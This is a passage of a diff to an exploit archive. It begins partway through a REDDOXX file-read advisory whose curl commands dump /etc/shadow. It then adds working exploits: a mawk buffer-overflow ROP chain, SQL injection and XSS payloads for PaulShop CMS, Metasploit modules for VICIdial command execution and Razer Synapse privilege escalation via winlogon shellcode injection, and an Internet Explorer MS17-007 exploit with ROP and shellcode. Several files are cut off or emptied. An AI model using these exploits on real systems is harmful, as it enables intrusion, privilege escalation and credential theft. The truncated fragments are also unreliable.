REDDOXX appliance [0] reachable via +http://www.example.com/rws/user/, HTTP POST requests are used to perform +certain actions. For example, the following request is used to save the +settings of the current user's profile: + +------------------------------------------------------------------------ + +POST /RdxEngine/json HTTP/1.1 +Host: www.example.com +[...] +Content-Type: application/x-www-form-urlencoded +Content-Length: 210 +Connection: close + +{ +"method": "CoreService.SaveUserProfile", +"params": { +"Profile": { +"UseHtmlMail": true, +"DefaultArchiveDisplayPeriode": "5", +"ReportLanguage": "en", +"EnableQueueReport": true +} +}, +"id": "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}" +} +------------------------------------------------------------------------ + +Through analysis of the .NET binaries pertaining to this endpoint, +extracted from the appliance ISO offered on the vendor's homepage [1], +the methods handling these requests were examined. For the +"SaveUserProfile" method, which is specified through the POST parameter +"method", the code is as follows: + +------------------------------------------------------------------------ + +// Reddoxx.Api.Legacy.CoreServiceService +public void SaveUserProfile(TRoUserProfile Profile) +{ +try +{ +this.client.OnStartRequest("CoreService", "SaveUserProfile"); +this.Service.SaveUserProfile(Profile); +this.client.OnEndRequest("CoreService", "SaveUserProfile"); +} +catch (System.Exception e) +{ +this.client.HandleException("CoreService", "SaveUserProfile", e); +} +} +------------------------------------------------------------------------ + +The "TroUserProfile" class contains information about the parameters +that are required for valid requests to this method: + +------------------------------------------------------------------------ + +namespace Reddoxx.Api.Legacy +{ +[...] +public class TRoUserProfile : ComplexType +{ +private string __ReportLanguage; + +private int __DefaultArchiveDisplayPeriode; + +private bool __EnableQueueReport; + +private bool __UseHtmlMail; + +[...] +} +} +------------------------------------------------------------------------ + +These variable names correspond to the POST parameters contained in the +request that was created when the profile was saved. With this knowledge +about how methods are called and parameters are passed, it was attempted +to call other methods from different packages. It was determined that it +is possible to access certain methods which allow reading arbitrary +files and directory listings. + +It was later discovered that the process handling requests to the +vulnerable methods runs with root privileges. + +Proof of Concept +================ + +At least two methods are found to be of interest for attackers: +FileTransfer.GetDirectoryList, which returns a directory listing for a +path specified via a parameter, and FileTransfer.DownloadFile, which +returns the file specified via a parameter in Base64-encoded form. The +following curl command-lines can be used to call the respective methods: + +------------------------------------------------------------------------ + +$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer +.GetDirectoryList","params":{"Directory": "/etc/"}}' 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName' +"chatscripts" +"gtk-2.0" +"xen" +"dbus-1" +"request-key.d" +"smartmontools" +"console" +"skel" +"xml" +"initramfs-tools" +"sysctl.d" +"pear" +"sudoers.d" +"cron.monthly" +"rc5.d" +"init" +"byobu" +"pki" +"xpdf" +"cron.weekly" +"snmp" +"ld.so.conf.d" +[...] +------------------------------------------------------------------------ + +Since the process handling the requests runs with root privileges, it +was also possible to read the contents of the file "/etc/passwd": + +------------------------------------------------------------------------ + +$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer +.DownloadFile","params":{"FileName": "/etc/shadow",''"Sequence": 1,"ChunkSize": 10000}}' 'http://www.example.com/RdxEngine/json' | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d +root:$6$XXXXXXXX$YYYYYYY[...]YYYYYYYY:14993:0:99999:7::: +daemon:*:16652:0:99999:7::: +bin:*:16652:0:99999:7::: +sys:*:16652:0:99999:7::: +sync:*:16652:0:99999:7::: +games:*:16652:0:99999:7::: +man:*:16652:0:99999:7::: +lp:*:16652:0:99999:7::: +mail:*:16652:0:99999:7::: +news:*:16652:0:99999:7::: +uucp:*:16652:0:99999:7::: +proxy:*:16652:0:99999:7::: +www-data:*:16652:0:99999:7::: +backup:*:16652:0:99999:7::: +list:*:16652:0:99999:7::: +irc:*:16652:0:99999:7::: +gnats:*:16652:0:99999:7::: +nobody:*:16652:0:99999:7::: +libuuid:!:16652:0:99999:7::: +syslog:*:16652:0:99999:7::: +messagebus:*:16899:0:99999:7::: +sshd:*:16899:0:99999:7::: +vboxadd:!:16899:::::: +statd:*:16899:0:99999:7::: +admin:$1$XXXXXXXX$ZZZZZZZZZZZZZZZZZZZZZZ:14054:0:99999:7::: +clamav:!:16899:0:99999:7::: +ntp:*:16899:0:99999:7::: +hacluster:!:16899:0:99999:7::: +firebird:*:16899:0:99999:7::: +redis:!:16899:0:99999:7::: +snmp:*:16899:0:99999:7::: +bind:*:16899:0:99999:7::: +smbadmin:!:17037:0:99999:7::: +smbuser:!:17037:0:99999:7::: +------------------------------------------------------------------------ + +Workaround +========== + +None + +Fix +=== + +Update the appliance software to Version 2032 SP2. + +Security Risk +============= + +Attackers with access to a REDDOXX appliance are able to retrieve +directory listings and content of arbitrary files. Although this +vulnerability requires attackers to submit a valid session ID, the +vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3] +show how this requirement can be fulfilled even by attackers without +valid credentials. Additionally, the RdxEngine process handling the +requests to the vulnerable methods runs with root privileges, allowing +attackers to read any file on the filesystem and, for example, extract +the local user hashes for offline brute-force attacks. This +vulnerability is therefore rated as a high risk. + +Timeline +======== + +2017-05-17 Vulnerability identified +2017-05-23 Customer approved disclosure of vulnerability +2017-05-26 Customer provided details of vulnerability to vendor +2017-07-20 Vulnerability reported as fixed by vendor +2017-07-24 Advisory released + +References +========== + +[0] https://www.reddoxx.com/en/ +[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads +(Requires login) +[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 +[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005 + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ \ No newline at end of file diff --git a/platforms/linux/local/38390.c b/platforms/linux/local/38390.c index 9390bd7be..18331a196 100755 --- a/platforms/linux/local/38390.c +++ b/platforms/linux/local/38390.c @@ -20,8 +20,7 @@ Local attackers can exploit this issue to gain kernel privileges, which will aid * * stealth@linux-czfh:~> cc -Wall clown-newuser.c -static * stealth@linux-czfh:~> ./a.out - * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian -Krahmer + * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer * * [+] Found myself: '/home/stealth/a.out' * [*] Parent waiting for boomsh to appear ... @@ -110,12 +109,10 @@ int main(int argc, char *argv[]) if (geteuid() == 0 && argc == 1) { - /* this will run inside chroot, started as the ld.so -from + /* this will run inside chroot, started as the ld.so from * su process */ - printf("[+] Yay! euid=%d uid=%d\n", geteuid(), -getuid()); + printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid()); chown("lib64/ld-linux-x86-64.so.2", 0, 0); chmod("lib64/ld-linux-x86-64.so.2", 04755); exit(0); @@ -126,8 +123,7 @@ getuid()); die("[-] execve"); } - printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 -Sebastian Krahmer\n\n"); + printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n"); memset(me, 0, sizeof(me)); readlink("/proc/self/exe", me, sizeof(me) - 1); @@ -176,5 +172,3 @@ Sebastian Krahmer\n\n"); die("[-] execve"); return -1; } - - diff --git a/platforms/linux/local/42357.py b/platforms/linux/local/42357.py new file mode 100755 index 000000000..532635880 --- /dev/null +++ b/platforms/linux/local/42357.py @@ -0,0 +1,98 @@ +#!/usr/bin/python +# Developed using Exploit Pack - http://exploitpack.com - +# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com +# Tested on: GNU/Linux - Kali 2017.1 Release +# +# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. +# +# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful +# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms. +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +import os, subprocess +from struct import pack + + ropchain = "A"*1038 # junk + ropchain += pack(' + + + + +
  • + + + + diff --git a/platforms/multiple/dos/42361.html b/platforms/multiple/dos/42361.html new file mode 100755 index 000000000..7e156aee2 --- /dev/null +++ b/platforms/multiple/dos/42361.html @@ -0,0 +1,197 @@ + + + + +
    +
    +aaa + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42362.html b/platforms/multiple/dos/42362.html new file mode 100755 index 000000000..656718a63 --- /dev/null +++ b/platforms/multiple/dos/42362.html @@ -0,0 +1,207 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42363.html b/platforms/multiple/dos/42363.html new file mode 100755 index 000000000..da830aa85 --- /dev/null +++ b/platforms/multiple/dos/42363.html @@ -0,0 +1,156 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42364.html b/platforms/multiple/dos/42364.html new file mode 100755 index 000000000..d3bf9e487 --- /dev/null +++ b/platforms/multiple/dos/42364.html @@ -0,0 +1,198 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42365.html b/platforms/multiple/dos/42365.html new file mode 100755 index 000000000..f02642faf --- /dev/null +++ b/platforms/multiple/dos/42365.html @@ -0,0 +1,187 @@ + + + + + + + + +
    + +
    + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42366.html b/platforms/multiple/dos/42366.html new file mode 100755 index 000000000..83fb6284f --- /dev/null +++ b/platforms/multiple/dos/42366.html @@ -0,0 +1,175 @@ + + + + + +
    +
    +
    foo
    + + \ No newline at end of file diff --git a/platforms/multiple/dos/42367.html b/platforms/multiple/dos/42367.html new file mode 100755 index 000000000..1bd5bb852 --- /dev/null +++ b/platforms/multiple/dos/42367.html @@ -0,0 +1,187 @@ + + + + +
    +
    +
    + + + \ No newline at end of file diff --git a/platforms/php/webapps/42359.txt b/platforms/php/webapps/42359.txt new file mode 100755 index 000000000..b0b573434 --- /dev/null +++ b/platforms/php/webapps/42359.txt @@ -0,0 +1,64 @@ +# Exploit Title: PaulShop CMS - Sql Injection and stored XSS +# Date: 07/23/2017 +# Exploit Author: BTIS Team (http://www.btis.vn) +# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714] +# Version: 03/27/2017 +# Tested on: Apache/2.4.7 (Ubuntu) +# Contact: research@btis.vn +# Can not contact vendor + + + +1. Description + +- SQL Injection on Search page with "q" parameter (GET) + +- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode] + +2. Examples + + + +- SQL injection: + + + +# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE] + +# Payload: - True condition: europe' and 1=1)-- - + + - False condition: europe' and 1=0)-- - + + + +- Stored XSS: + + + +# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E + +# curl -X POST \ + + 'http://localhost/shop/en/account?save=1' \ + + -H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \ + + -b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \ + + -d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save' + + + +Quan Minh Tâm / Trưởng phòng kỹ thuật + tamqm@btis.vn / 01284 211 290 + +CÔNG TY CÔNG NGHỆ BẢO TÍN +028 3810 6288 – 028 38106289 +5A Trần Văn Dư, phường 13, quận Tân Bình, Tp.Hồ Chí Minh + www.btis.vn + + + + +Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard. +Để biết thêm thông tin, hãy truy cập www.bullguard.com diff --git a/platforms/unix/remote/42370.rb b/platforms/unix/remote/42370.rb new file mode 100755 index 000000000..f2fbcb10d --- /dev/null +++ b/platforms/unix/remote/42370.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in VICIdial versions + 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users + to execute arbitrary operating system commands as the web + server user if password encryption is enabled (disabled + by default). + + When password encryption is enabled the user's password + supplied using HTTP basic authentication is used in a call + to exec(). + + This module has been tested successfully on version 2.11 RC2 + and 2.13 RC1 on CentOS. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + # HTTP Basic authentication password + 'Space' => 2048, + # apostrophe ('), quote ("), semi-colon (;) and backslash (\) + # are removed by preg_replace + 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat' + } + }, + 'Targets' => [[ 'Automatic Targeting', {} ]], + 'Privileged' => false, + 'DisclosureDate' => 'May 26 2017', + 'DefaultTarget' => 0)) + register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) + deregister_options('USERNAME', 'PASSWORD') + end + + def check + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}&#" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + unless res + vprint_status 'Connection failed' + return CheckCode::Unknown + end + + if res.code != 401 + vprint_status "#{peer} Unexpected reply. Expected authentication failure." + return CheckCode::Safe + end + + # Check for input filtering of '#' and '&' characters in password + # Response for invalid credentials is in the form of: |||BAD| + if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ + vprint_status "#{peer} Target is patched." + return CheckCode::Safe + end + + # Check for ../agc/bp.pl password encryption script + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') + if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ + vprint_status "#{peer} Password encryption is supported, but may not be enabled." + return CheckCode::Appears + end + + vprint_status "#{peer} Could not verify whether password encryption is supported." + CheckCode::Detected + end + + def execute_command(cmd, opts = {}) + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" + + print_status "#{peer} Sending payload (#{cmd.length} bytes)" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + if !res + fail_with(Failure::Unreachable, 'Connection failed') + elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ + print_good "#{peer} Payload sent successfully" + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply') + end + end + + def exploit + execute_command(payload.encoded) + end +end \ No newline at end of file diff --git a/platforms/win_x86-64/local/42368.rb b/platforms/win_x86-64/local/42368.rb new file mode 100755 index 000000000..f8a7ad41a --- /dev/null +++ b/platforms/win_x86-64/local/42368.rb @@ -0,0 +1,260 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/windows_kernel' +require 'rex' +require 'metasm' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Local::WindowsKernel + include Msf::Post::Windows::Priv + + # the max size our hook can be, used before it's generated for the allocation + HOOK_STUB_MAX_LENGTH = 256 + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess', + 'Description' => %q{ + A vulnerability exists in the latest version of Razer Synapse + (v2.20.15.1104 as of the day of disclosure) which can be leveraged + locally by a malicious application to elevate its privileges to those of + NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler + in the rzpnk.sys driver that passes a PID specified by the user to + ZwOpenProcess. This can be issued by an application to open a handle to + an arbitrary process with the necessary privileges to allocate, read and + write memory in the specified process. + + This exploit leverages this vulnerability to open a handle to the + winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by + installing a hook to execute attacker controlled shellcode. This hook is + then triggered on demand by calling user32!LockWorkStation(), resulting + in the attacker's payload being executed with the privileges of the + infected winlogon process. In order for the issued IOCTL to work, the + RazerIngameEngine.exe process must not be running. This exploit will + check if it is, and attempt to kill it as necessary. + + The vulnerable software can be found here: + https://www.razerzone.com/synapse/. No Razer hardware needs to be + connected in order to leverage this vulnerability. + + This exploit is not opsec-safe due to the user being logged out as part + of the exploitation process. + }, + 'Author' => 'Spencer McIntyre', + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2017-9769'], + ['URL', 'https://warroom.securestate.com/cve-2017-9769/'] + ], + 'Platform' => 'win', + 'Targets' => + [ + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 10.0.10586 + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'WfsDelay' => 20 + }, + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Mar 22 2017')) + end + + def check + # Validate that the driver has been loaded and that + # the version is the same as the one expected + client.sys.config.getdrivers.each do |d| + if d[:basename].downcase == 'rzpnk.sys' + expected_checksum = 'b4598c05d5440250633e25933fff42b0' + target_checksum = client.fs.file.md5(d[:filename]) + + if expected_checksum == Rex::Text.to_hex(target_checksum, '') + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + end + end + + Exploit::CheckCode::Safe + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + elsif session.arch != ARCH_X64 + fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets') + end + + pid = session.sys.process['RazerIngameEngine.exe'] + if pid + # if this process is running, the IOCTL won't work but the process runs + # with user privileges so we can kill it + print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") + session.sys.process.kill(pid) + end + + pid = session.sys.process['winlogon.exe'] + print_status("Found winlogon pid: #{pid}") + + handle = get_handle(pid) + fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? + vprint_status('Successfully opened a handle to the winlogon process') + + winlogon = session.sys.process.new(pid, handle) + allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH + shellcode_address = winlogon.memory.allocate(allocation_size) + winlogon.memory.protect(shellcode_address) + print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}") + winlogon.memory.write(shellcode_address, payload.encoded) + hook_stub_address = shellcode_address + payload.encoded.length + + result = session.railgun.kernel32.LoadLibraryA('user32') + fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0 + user32_handle = result['return'] + + # resolve and backup the functions that we'll install trampolines in + user32_trampolines = {} # address => original chunk + user32_functions = ['LockWindowStation'] + user32_functions.each do |function| + address = get_address(user32_handle, function) + winlogon.memory.protect(address) + user32_trampolines[function] = { + address: address, + original: winlogon.memory.read(address, 24) + } + end + + # generate and install the hook asm + hook_stub = get_hook(shellcode_address, user32_trampolines) + fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? + # if this happens, there was a programming error + fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH + + winlogon.memory.write(hook_stub_address, hook_stub) + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}") + + # install the asm trampolines to jump to the hook + user32_trampolines.each do |function, trampoline_info| + address = trampoline_info[:address] + trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ + mov rax, 0x#{address.to_s(16)} + push rax + mov rax, 0x#{hook_stub_address.to_s(16)} + jmp rax + }).encode_string + winlogon.memory.write(address, trampoline) + vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}") + end + + session.railgun.user32.LockWorkStation() + session.railgun.kernel32.CloseHandle(handle) + end + + def get_address(dll_handle, function_name) + result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name) + fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0 + result['return'] + end + + # this is where the actual vulnerability is leveraged + def get_handle(pid) + handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') + return nil unless handle + vprint_status('Successfully opened a handle to the driver') + + buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL') + + session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[ + ['DWORD', 'FileHandle', 'in' ], + ['DWORD', 'Event', 'in' ], + ['LPVOID', 'ApcRoutine', 'in' ], + ['LPVOID', 'ApcContext', 'in' ], + ['PDWORD', 'IoStatusBlock', 'out'], + ['DWORD', 'IoControlCode', 'in' ], + ['PBLOB', 'InputBuffer', 'in' ], + ['DWORD', 'InputBufferLength', 'in' ], + ['PBLOB', 'OutputBuffer', 'out'], + ['DWORD', 'OutputBufferLength', 'in' ], + ]) + result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length) + return nil if result['return'] != 0 + session.railgun.kernel32.CloseHandle(handle) + + result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1] + end + + def get_hook(shellcode_address, restore) + dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return'] + return nil if dll_handle == 0 + create_thread_address = get_address(dll_handle, 'CreateThread') + + stub = %{ + call main + ; restore the functions where the trampolines were installed + push rbx + } + + restore.each do |function, trampoline_info| + original = trampoline_info[:original].unpack('Q*') + stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}" + original.each do |chunk| + stub << %{ + mov rbx, 0x#{chunk.to_s(16)} + mov qword ptr ds:[rax], rbx + add rax, 8 + } + end + end + + stub << %{ + pop rbx + ret + + main: + ; backup registers we're going to mangle + push r9 + push r8 + push rdx + push rcx + + ; setup the arguments for the call to CreateThread + xor rax, rax + push rax ; lpThreadId + push rax ; dwCreationFlags + xor r9, r9 ; lpParameter + mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress + xor rdx, rdx ; dwStackSize + xor rcx, rcx ; lpThreadAttributes + mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread + + call rax + add rsp, 16 + + ; restore arguments that were mangled + pop rcx + pop rdx + pop r8 + pop r9 + ret + } + Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string + end +end \ No newline at end of file diff --git a/platforms/windows/remote/42354.html b/platforms/windows/remote/42354.html new file mode 100755 index 000000000..fc348073e --- /dev/null +++ b/platforms/windows/remote/42354.html @@ -0,0 +1,252 @@ +# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote +Code Execution (MS17-007) +# Google Dork: NA +# Date: 24/7/2017 +# Exploit Author: Mohamed Hamdy - Nsecurity +# Vendor Homepage: https://www.microsoft.com +# Version: Microsoft Internet Explorer 11 +# Tested on: Windows 7 SP1 x86 +# CVE : CVE-2017-0037 + + changed to 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u45d5%uf076" + // 0xf07645d5 : ,# put delta into eax (-> put 0x00001000 into edx) + "%ue002%u6af9" + // 0x6af9e002 : ,# ADD EAX,0F89CA2B # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%uaebc%u6af3" + // 0x6af3aebc : ,# XCHG EAX,EDX # RETN [PROPSYS.dll] + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 + "%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u361b%u6af9" + // 0x6af9361b : ,# XCHG EAX,ECX # ADD DL,B # DEC ECX # RETN 0x08 [PROPSYS.dll] + "%u32cf%u6af7" + // 0x6af732cf : ,# POP EDI # RETN [PROPSYS.dll] + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u40bd%u6af4" + // 0x6af440bd : ,# RETN (ROP NOP) [PROPSYS.dll] + "%ucef1%u6af8" + // 0x6af8cef1 : ,# POP ESI # RETN [PROPSYS.dll] + "%u177e%u6af7" + // 0x6af7177e : ,# JMP [EAX] [PROPSYS.dll] + "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] + "%u1244%u6af3" + // 0x6af31244 : ,# ptr to &VirtualAlloc() [IAT PROPSYS.dll] + "%u6af8" + // 0x6af80a14 : ,# PUSHAD # ADD AL,0 # MOV EAX,80004001 # POP EBP # RETN 0x08 [PROPSYS.dll] --> changed to 0x6af3a819 : # PUSHAD # CMP EAX,0C68B6AF3 # POP ESI # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) + "%u720b%u6af5" + // 0x6af5720b : ,# ptr to 'jmp esp' [PROPSYS.dll] + + */ + + + + // Move ESP to the VirtualAlloc ROP chain + var stack_shift_rop = unescape( + writeu(0,235802130) + + writeu(base_leaked_addr,0x2030f) + // 0x6af5030f : # POP EBX # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x0e0e1258) + + writeu(base_leaked_addr,0x28002) + // 0x6af58002 : # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08 ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x41414141) + + writeu(0,0x41414141) + + writeu(base_leaked_addr,0x0b473) + //0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + writeu(0,0x41414141) + + writeu(0,0x41414141) + + ""); + + + + + // root@kali:~# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -f js_le + // ~2854 bytes max + + var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption + "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" + + ""); + + + var xchg = unescape(writeu(base_leaked_addr, 0x0b473)); // Initial EIP control ---> 0x6af3b473 : # XCHG EAX,ESP # RETN ** [PROPSYS.dll] ** | {PAGE_EXECUTE_READ} + var fix1 = 0x15c; + var fixop = 